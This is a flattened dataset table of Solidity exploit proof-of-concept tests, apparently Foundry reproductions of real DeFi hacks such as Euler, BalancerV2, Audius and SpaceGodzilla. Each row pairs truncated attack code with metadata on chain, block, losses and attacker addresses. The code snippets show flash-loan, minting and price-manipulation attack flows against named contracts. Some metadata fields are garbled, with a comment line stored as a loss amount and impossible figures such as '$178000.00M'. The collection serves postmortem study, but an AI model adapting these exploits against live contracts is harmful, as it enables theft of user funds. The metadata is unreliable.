import "./../interface.sol";
/*
@Analysis
https://twitter.com/PeckShieldAlert/status/1645980197987192833
https://twitter.com/Phalcon_xyz/status/1645963327502204929
@TX (one of the txs)
invest
https://bscscan.com/tx/0xdb01fa33bf5b79a... | exploit_poc | MetaPoint | 2023-04 | MetaPoint_exp.sol | null | c1e2139eddbcb4a8 | 2026-01-07T10:59:16.547358 | postmortems | bsc | 27,264,384 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public {
address[11] memory victims = [
0x724DbEA8A0ec7070de448ef4AF3b95210BDC8DF6,
0xE5cBd18Db5C1930c0A07696eC908f20626a55E3C,
0xC254741776A13f0C3eFF755a740A4B2aAe14a136,
0x5923375f1a732FD919D320800eAeCC25910bEdA3,
0x68531F3d3A2... | true | Unknown | 3.41 | low | MetaPoint Exploit (2023-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/peckshield/status/1643417467879059456
// https://twitter.com/spreekaway/status/1643313471180644360
// https://medium.com/coinmonks/theoretical-practical-balance... | exploit_poc | Sentiment | 2023-04 | Sentiment_exp.sol | flash_loan | c8a76b858de145be | 2026-01-07T10:59:16.547408 | postmortems | arbitrum | 77,026,912 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | false | Unknown | 4 | low | Sentiment Exploit (2023-04) | false | false | false | false | ||||||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/cmichelio/status/1646422861219807233
// https://twitter.com/BeosinAlert/status/1646481687445114881
// @TX
// https://etherscan.io/tx/0x055cec4fa4614836e54ea2e5cd3d14247ff3d61b85aa2a41f8cc876d131e032... | exploit_poc | YearnFinance | 2023-04 | YearnFinance_exp.sol | flash_loan | 903cfd74c4cf2458 | 2026-01-07T10:59:16.547502 | postmortems | ethereum | 17,036,774 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
init();
run();
emit log_named_decimal_uint("[End] Attacker USDC balance after exploit", usdc.balanceOf(address(this)), 6);
emit log_named_decimal_uint("[End] Attacker DAI balance after exploit", dai.balanceOf(address(this)), 18);
emit log_named... | true | Unknown | 6 | medium | YearnFinance Exploit (2023-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/Phalcon_xyz/status/1645742620897955842
// https://twitter.com/BlockSecTeam/status/1645744655357575170
// https://twitter.com/peckshield/status/16457422969049292... | exploit_poc | Paribus | 2023-04 | Paribus_exp.sol | flash_loan | 427ae67093c0f223 | 2026-01-07T10:59:16.547629 | postmortems | arbitrum | 79,308,097 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | false | Unknown | 3.54 | low | Paribus Exploit (2023-04) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BeosinAlert/status/1648520494516420608
// @TX
// https://bscscan.com/tx/0xa21692ffb561767a74a4cbd1b78ad48151d710efab723b1efa5f1e0147caab0a
// @Summary
// The at... | exploit_poc | OLIFE | 2023-04 | OLIFE_exp.sol | flash_loan | 7db91570b619d1f4 | 2026-01-07T10:59:16.547678 | postmortems | bsc | 27,470,678 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | false | Unknown | 2.91 | low | OLIFE Exploit (2023-04) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/peckshield/status/1644907207530774530
// https://twitter.com/SlowMist_Team/status/1644936375924584449
// https://twitter.com/AnciliaInc/status/16449254210065203... | exploit_poc | Sushi_Router | 2023-04 | Sushi_Router_exp.sol | null | 5af111ede804de2f | 2026-01-07T10:59:16.547733 | postmortems | unknown | 17,007,841 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | false | Unknown | 1.72 | low | Sushi_Router Exploit (2023-04) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/CertiKAlert/status/1647530789947469825
// https://twitter.com/BeosinAlert/status/1647552192243728385
// @TX
// https://etherscan.io/address/0x2df07c054138bf2934... | exploit_poc | Swapos | 2023-04 | Swapos_exp.sol | null | 6ece621f489c6a74 | 2026-01-07T10:59:16.547782 | postmortems | ethereum | 17,057,419 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | false | Unknown | 0.87 | low | Swapos Exploit (2023-04) | false | false | false | false | ||||||||
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
@Analysis
https://twitter.com/HypernativeLabs/status/1650382589847302145
1. buy on presale
2. sale on pancake v2
@TX
https://bscscan.com/tx/0x05eabbb665a5b99490510d0b3f93565f394914294ab4d609895e525b43... | exploit_poc | Axioma | 2023-04 | Axioma_exp.sol | flash_loan | 2f559c48cd1e6bd9 | 2026-01-07T10:59:16.547820 | postmortems | bsc | 27,620,321 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
uint256 flashLoanAmount = 32_500_000_000_000_000_000;
address wbnb = DVM(wbnb_usdt_b)._BASE_TOKEN_();
DVM(wbnb_usdt_b).flashLoan(flashLoanAmount, 0, address(this), abi.encode(wbnb_usdt_b, wbnb, flashLoanAmount));
} | true | Unknown | 4.21 | low | Axioma Exploit (2023-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
IDPPAdvanced constant dppAdvanced = IDPPAdvanced(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476);
WBNB constant wbnb = WBNB(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173... | exploit_poc | poolz | 2023-03 | poolz_exp.sol | flash_loan | c68a388183a0080d | 2026-01-07T10:59:16.547871 | postmortems | unknown | 26,475,403 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | false | Unknown | 4 | low | poolz Exploit (2023-03) | false | false | false | false | ||||||||
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
interface IUniswapV2Router02 {
function WETH() external pure returns (address);
function routerTrade() external pure returns (address);
}
interface ISafemoon {
function uniswapV2Router() external returns (IUniswapV2Router02);
function uniswapV2P... | exploit_poc | safeMoon | 2023-03 | safeMoon_exp.sol | null | 0aa30c52a964fa9c | 2026-01-07T10:59:16.547959 | postmortems | unknown | 26,854,757 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testMint() public {
vm.rollFork(26_854_757);
uint256 originalBalance = sfmoon.balanceOf(address(this));
emit log_named_uint("sfmoon balance before:", originalBalance);
assertEq(originalBalance, 0);
sfmoon.mint(address(this), sfmoon.balanceOf(sfmoon.bridgeBurnAddress())... | true | Unknown | 4.71 | low | safeMoon Exploit (2023-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.17;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/HypernativeLabs/status/1633090456157401088
// @TX
// https://polygonscan.com/tx/0x6fa6374d43df083679cdab97149af8207cda2471620a06d3f28b115136b8e2c4
// @Summary
/... | exploit_poc | Phoenix | 2023-03 | Phoenix_exp.sol | flash_loan | 3c1abbe7dbdc7eff | 2026-01-07T10:59:16.548014 | postmortems | polygon | 40,066,946 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
deal(address(WETH), address(this), 7 * 1e15);
MYTOKEN = new SHITCOIN();
MYTOKEN.mint(1_500_000 * 1e18);
MYTOKEN.approve(address(Router), type(uint256).max);
WETH.approve(address(Router), type(uint256).max);
Router.addLiquidity(address(MYTOK... | true | Unknown | 5.39 | medium | Phoenix Exploit (2023-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @TX
// https://bscscan.com/tx/0x9fe19093a62a7037d04617b3ac4fbf5cb2d75d8cb6057e7e1b3c75cbbd5a5adc
// Related Events
// https://github.com/SunWeb3Sec/DeFiHackLabs/#20230207---fdp---reflection-tok... | exploit_poc | BIGFI | 2023-03 | BIGFI_exp.sol | flash_loan | f6771c07ccd3f6e0 | 2026-01-07T10:59:16.548066 | postmortems | bsc | 26,685,503 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | false | Unknown | 2.7 | low | BIGFI Exploit (2023-03) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1636650252844294144
// @TX
// https://etherscan.io/tx/0xe3f0d14cfb6076cabdc9057001c3fafe28767a192e88005bc37bd7d385a1116a
contract ContractT... | exploit_poc | paraspace | 2023-03 | paraspace_exp.sol | null | 27c1e58db3705c21 | 2026-01-07T10:59:16.548143 | postmortems | ethereum | 16,845,558 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | false | Unknown | 3 | low | paraspace Exploit (2023-03) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/LTV888/status/1640563457094451214?t=OBHfonYm9yYKvMros6Uw_g&s=19
// @Tx
// https://bscscan.com/tx/0xdf6252854362c3e96fd086d9c3a5397c303d265649aee0b023176bb49cf00... | exploit_poc | Thena | 2023-03 | Thena_exp.sol | null | 38d854709b4b850a | 2026-01-07T10:59:16.548237 | postmortems | bsc | 26,834,149 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | false | Unknown | 1.97 | low | Thena Exploit (2023-03) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/FrankResearcher/status/1635241475989721089
// https://twitter.com/nomorebear/status/1635230621856600064
// https://twitter.com/peckshield/status/163522959459603... | exploit_poc | Euler | 2023-03 | Euler_exp.sol | flash_loan | 7ece83371eb2b977 | 2026-01-07T10:59:16.548307 | postmortems | ethereum | 16,817,995 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
uint256 aaveFlashLoanAmount = 30_000_000 * 1e18;
address[] memory assets = new address[](1);
assets[0] = address(DAI);
uint256[] memory amounts = new uint256[](1);
amounts[0] = aaveFlashLoanAmount;
uint256[] memory modes = new uint256[](1);... | true | Unknown | 6 | medium | Euler Exploit (2023-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/CertiKAlert/status/1633421908996763648
// @TX
// https://bscscan.com/tx/0x0c850f54c1b497c077109b3d2ef13c042bb70f7f697201bcf2a4d0cb95e74271
// https://bscscan.co... | exploit_poc | DKP | 2023-03 | DKP_exp.sol | flash_loan | 349a55e67ecf7790 | 2026-01-07T10:59:16.548372 | postmortems | bsc | 26,284,131 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
deal(address(USDT), address(this), 800 * 1e18);
exchangeDKP();
DKPToUSDT();
emit log_named_decimal_uint(
"Attacker USDT balance after exploit", USDT.balanceOf(address(this)) - 800 * 1e18, USDT.decimals()
);
} | true | Unknown | 4.91 | low | DKP Exploit (2023-03) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BeosinAlert/status/1639655134232969216
// https://twitter.com/AnciliaInc/status/1639289686937210880
// @TX
// https://bscscan.com/tx/0x3b472f87431a52082bae7d852... | exploit_poc | DBW | 2023-03 | DBW_exp.sol | flash_loan | ebb471d79f7cd17b | 2026-01-07T10:59:16.548422 | postmortems | bsc | 26,745,691 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | false | Unknown | 4 | low | DBW Exploit (2023-03) | false | false | false | false | ||||||||
pragma solidity ^0.8.0;
import "forge-std/Test.sol";
import "../interface.sol";
import "../StableMath.sol";
// @KeyInfo - Total Lost : 120M USD
// Attacker : https://etherscan.io/address/0x506d1f9efe24f0d47853adca907eb8d89ae03207
// Attack Contract : https://etherscan.io/address/0x54B53503c0e2173Df29f8da735fBd45Ee8aB... | exploit_poc | BalancerV2 | 2025-11 | BalancerV2_exp.sol | null | 9cf837fa17a20573 | 2026-01-07T10:59:16.548538 | postmortems | ethereum | 23,717,397 | 120M USD | 120,000,000 | https://etherscan.io/address/0x506d1f9efe24f0d47853adca907eb8d89ae03207 | https://etherscan.io/address/0x54B53503c0e2173Df29f8da735fBd45Ee8aBa30d | null | https://app.blocksec.com/explorer/tx/eth/0x6ed07db1a9fe5c0794d44cd36081d6a6df103fab868cdd75d581e3bd23bc9742 | https://x.com/BlockSecTeam/status/1986057732810518640, | https://x.com/BlockSecTeam/status/1986057732810518640, | true | true | false | critical | 120M USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of address(beneficiary)", IERC20(weth).balanceOf(address(beneficiary)), 18);
emit log_named_decimal_uint("before attack: balance of address(beneficiary)", IERC20(osETH_wETH).balanceOf(address(beneficiary)), 18);
emit... | true | 120M USD | https://etherscan.io/address/0x506d1f9efe24f0d47853adca907eb8d89ae03207 | https://etherscan.io/address/0x54B53503c0e2173Df29f8da735fBd45Ee8aBa30d | https://app.blocksec.com/explorer/tx/eth/0x6ed07db1a9fe5c0794d44cd36081d6a6df103fab868cdd75d581e3bd23bc9742 | https://x.com/BlockSecTeam/status/1986057732810518640, | https://x.com/BlockSecTeam/status/1986057732810518640, | $120.00M | 8 | high | BalancerV2 Exploit (2025-11) | true | false | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 100K USDT
// Attacker : https://etherscan.io/address/0xC0ffeEBABE5D496B2DDE509f9fa189C25cF29671
// Attack Contract : https://etherscan.io/address/0xe08d97e151473a848c3d9ca3f... | exploit_poc | DRLVaultV3 | 2025-11 | DRLVaultV3_exp.sol | flash_loan | 7cad7a572dd38816 | 2026-01-07T10:59:16.548646 | postmortems | ethereum | null | 100K USDT | 100,000 | https://etherscan.io/address/0xC0ffeEBABE5D496B2DDE509f9fa189C25cF29671 | https://etherscan.io/address/0xe08d97e151473a848c3d9ca3f323cb720472d015 | https://etherscan.io/address/0x6A06707ab339BEE00C6663db17DdB422301ff5e8 | https://etherscan.io/tx/0xe3eab35b288c086afa9b86a97ab93c7bb61d21b1951a156d2a8f6f5d5715c475 | https://blog.verichains.io/p/the-drlvaultv3-exploit-a-slippage | null | true | true | true | high | 100K USDT | flash-loan | function testExploit() public balanceLog {
bytes memory data = abi.encode(uint8(1));
morpho.flashLoan(USDC_ADDR, FLASHLOAN_USDC, data);
} | true | 100K USDT | https://etherscan.io/address/0xC0ffeEBABE5D496B2DDE509f9fa189C25cF29671 | https://etherscan.io/address/0xe08d97e151473a848c3d9ca3f323cb720472d015 | https://etherscan.io/address/0x6A06707ab339BEE00C6663db17DdB422301ff5e8 | https://etherscan.io/tx/0xe3eab35b288c086afa9b86a97ab93c7bb61d21b1951a156d2a8f6f5d5715c475 | https://blog.verichains.io/p/the-drlvaultv3-exploit-a-slippage | $100.0K | 10 | high | DRLVaultV3 Exploit (2025-11) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 1M USD
// Attacker : https://basescan.org/address/0x6997a8c804642ae2de16d7b8ff09565a5d5658ff
// Attack Contract : https://basescan.org/address/0x42ecd332d47c91cbc83b39bd7... | exploit_poc | Moonwell | 2025-11 | Moonwell_exp.sol | null | 9008949c528d5bd2 | 2026-01-07T10:59:16.548728 | postmortems | base | null | 1M USD | 1,000,000 | https://basescan.org/address/0x6997a8c804642ae2de16d7b8ff09565a5d5658ff | https://basescan.org/address/0x42ecd332d47c91cbc83b39bd7f53cebe5e9734bb | null | https://app.blocksec.com/explorer/tx/base/0x190a491c0ef095d5447d6d813dc8e2ec11a5710e189771c24527393a2beb05ac | null | null | true | true | false | critical | 1M USD | unknown | function testExploit() public {
uint256 wethBefore = IERC20(WETH).balanceOf(address(attacker));
attacker.attack();
uint256 wethAfter = IERC20(WETH).balanceOf(address(attacker));
emit log_named_uint("WETH profit", wethAfter - wethBefore);
assertGt(wethAfter, wethBefore);
}
... | true | 1M USD | https://basescan.org/address/0x6997a8c804642ae2de16d7b8ff09565a5d5658ff | https://basescan.org/address/0x42ecd332d47c91cbc83b39bd7f53cebe5e9734bb | https://app.blocksec.com/explorer/tx/base/0x190a491c0ef095d5447d6d813dc8e2ec11a5710e189771c24527393a2beb05ac | $1.00M | 8 | high | Moonwell Exploit (2025-11) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost :
// Attacker : https://etherscan.io/address/0xd1c0f1316140D6bF1a9e2Eea8a227dAD151F69b7
// Vulnerable Contract : https://etherscan.io/address/0xb983e01458529665007ff7e0cddecd... | exploit_poc | bzx | 2020-09 | bzx_exp.sol | flash_loan | b5296bae83072ab7 | 2026-01-07T10:59:16.548794 | postmortems | ethereum | null | // Attacker : https://etherscan.io/address/0xd1c0f1316140D6bF1a9e2Eea8a227dAD151F69b7 | 0 | https://etherscan.io/address/0xd1c0f1316140D6bF1a9e2Eea8a227dAD151F69b7 | null | https://etherscan.io/address/0xb983e01458529665007ff7e0cddecdb74b967eb6 | https://etherscan.io/tx/0x85dc2a433fd9eaadaf56fd8156c956da23fc17e5ef83955c7e2c4c37efa20bb5 | null | https://x.com/0xCommodity/status/1305354469354303488 | true | true | true | low | // Attacker : https://etherscan.io/address/0xd1c0f1316140D6bF1a9e2Eea8a227dAD151F69b7 | flash-loan | function testExploit() public balanceLog {
//implement exploit code here
vm.deal(address(this), 200 ether); //simulation flashloan
loanToken.mintWithEther{value: 200 ether}(address(this));
// transfer token to myself repeatedly
for (int256 i = 0; i < 4; i++) {
uint25... | true | // | https://etherscan.io/address/0xd1c0f1316140D6bF1a9e2Eea8a227dAD151F69b7 | https://etherscan.io/address/0xb983e01458529665007ff7e0cddecdb74b967eb6 | https://etherscan.io/tx/0x85dc2a433fd9eaadaf56fd8156c956da23fc17e5ef83955c7e2c4c37efa20bb5 | https://x.com/0xCommodity/status/1305354469354303488 | Unknown | 6.91 | medium | bzx Exploit (2020-09) | false | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 704 ETH (~ 1,080,000 US$)
// Attacker : 0xa0c7bd318d69424603cbf91e9969870f21b8ab4c
// AttackContract : 0xbdbb5945f252bc3466a319cdcc3ee8056bf2e569
// Tx1 initialize + Pro... | exploit_poc | Audius | 2022-07 | Audius_exp.sol | null | 013293e3055b0e87 | 2026-01-07T10:59:16.548858 | postmortems | ethereum | 15,201,793 | 704 ETH (~ 1,080,000 US$) | 704 | null | null | null | null | https://blog.audius.co/article/audius-governance-takeover-post-mortem-7-23-22 | null | true | false | false | low | 704 ETH (~ 1,080,000 US$) | unknown | function testExploit() public {
console.log("---------- Start from Block %s ----------", block.number);
emit log_named_decimal_uint("Attacker ETH Balance", attacker.balance, 18);
console.log("-------------------- Tx1 --------------------");
console.log("Modify configurations...");
... | true | 704 ETH (~ 1,080,000 US$) | $704 | 7 | medium | Audius Exploit (2022-07) | true | false | false | true | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface Quixotic {
function fillSellOrder(
address seller,
address contractAddress,
uint256 tokenId,
uint256 startTime,
uint256 expiration,
uin... | exploit_poc | Quixotic | 2022-07 | Quixotic_exp.sol | null | a805cf22d401bfc8 | 2026-01-07T10:59:16.548928 | postmortems | unknown | 13,591,383 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
cheat.prank(0x0A0805082EA0fc8bfdCc6218a986efda6704eFE5);
emit log_named_uint(
"Before exploiting, attacker OP Balance:", op.balanceOf(0x0A0805082EA0fc8bfdCc6218a986efda6704eFE5)
);
quixotic.fillSellOrder(
0x0A0805082EA0fc8bfdCc6218a... | true | Unknown | 3.14 | low | Quixotic Exploit (2022-07) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 178 BNB (~ 45,715 US$)
// Attacker : 0xd9936EA91a461aA4B727a7e3661bcD6cD257481c
// AttackContract : 0xcfb7909b7eb27b71fdc482a2883049351a1749d7
// Txhash : 0x0e970ed84424... | exploit_poc | LPC | 2022-07 | LPC_exp.sol | flash_loan | 818af54b528b3b15 | 2026-01-07T10:59:16.548977 | postmortems | bsc | 19,852,596 | 178 BNB (~ 45,715 US$) | 178,000,000,000 | null | null | null | null | null | null | true | false | true | critical | 178 BNB (~ 45,715 US$) | flash-loan | function testExploit() public {
emit log_named_decimal_uint("LPC balance", IERC20(LPC).balanceOf(address(this)), 18);
console.log("Get LPC reserve in PancakeSwap...");
(uint256 LPC_reserve,,) = IPancakePair(pancakePair).getReserves();
emit log_named_decimal_uint("\tLPC Reserve", LPC_res... | true | 178 BNB (~ 45,715 US$) | $178000.00M | 6.36 | medium | LPC Exploit (2022-07) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
Flippaz FlippazOne = Flippaz(0xE85A08Cf316F695eBE7c13736C8Cc38a7Cc3e944);... | exploit_poc | FlippazOne | 2022-07 | FlippazOne_exp.sol | null | d951b44da0018b67 | 2026-01-07T10:59:16.549029 | postmortems | unknown | 15,083,765 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
address alice = cheat.addr(1);
emit log_named_uint("Before exploiting, ETH balance of FlippazOne Contract:", address(FlippazOne).balance);
cheat.prank(msg.sender);
FlippazOne.bid{value: 2 ether}();
emit log_named_uint("After bidding, ETH balance of... | true | Unknown | 2.59 | low | FlippazOne Exploit (2022-07) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// Credit: SupremacyCA, the poc rewritten from SupremacyCA.
contract ContractTest is Test {
IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
IERC20 doodle = IERC20(0x2F13... | exploit_poc | Omni | 2022-07 | Omni_exp.sol | flash_loan | 575523e5b082d7b7 | 2026-01-07T10:59:16.549073 | postmortems | unknown | 15,114,361 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
payable(address(0)).transfer(address(this).balance);
emit log_named_uint("Before exploiting, ETH balance of attacker:", address(this).balance);
address[] memory tokens = new address[](1);
tokens[0] = address(WETH);
uint256[] memory amounts = new u... | true | Unknown | 6 | medium | Omni Exploit (2022-07) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/* @KeyInfo - Total Lost : 25,378 BUSD
Attacker Wallet : https://bscscan.com/address/0x00a62eb08868ec6feb23465f61aa963b89e57e57
Attack Contract : https://bscscan.com/address/0x3d817ea746ed... | exploit_poc | SpaceGodzilla | 2022-07 | SpaceGodzilla_exp.sol | flash_loan | ea602edc5bf4b7cd | 2026-01-07T10:59:16.549177 | postmortems | bsc | 19,523,980 | 25,378 BUSD | 25 | null | https://bscscan.com/address/0x3d817ea746edd02c088c4df47c0ece0bd28dcd72 | null | https://bscscan.com/tx/0x7f183df11f1a0225b5eb5bb2296b5dc51c0f3570e8cc15f0754de8e6f8b4cca4*/ | null | null | true | false | true | low | 25,378 BUSD | flash-loan | function testExploit() public {
uint256 init_capital = IERC20(USDT).balanceOf(address(this));
emit log_named_decimal_uint("[info] Attacker USDT Balance", init_capital, 18);
// ========================================================
ISpaceGodzilla(SpaceGodzilla).swapTokensForOther(69_12... | true | 25,378 BUSD | https://bscscan.com/address/0x3d817ea746edd02c088c4df47c0ece0bd28dcd72 | https://bscscan.com/tx/0x7f183df11f1a0225b5eb5bb2296b5dc51c0f3570e8cc15f0754de8e6f8b4cca4*/ | $25 | 9 | high | SpaceGodzilla Exploit (2022-07) | true | false | true | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.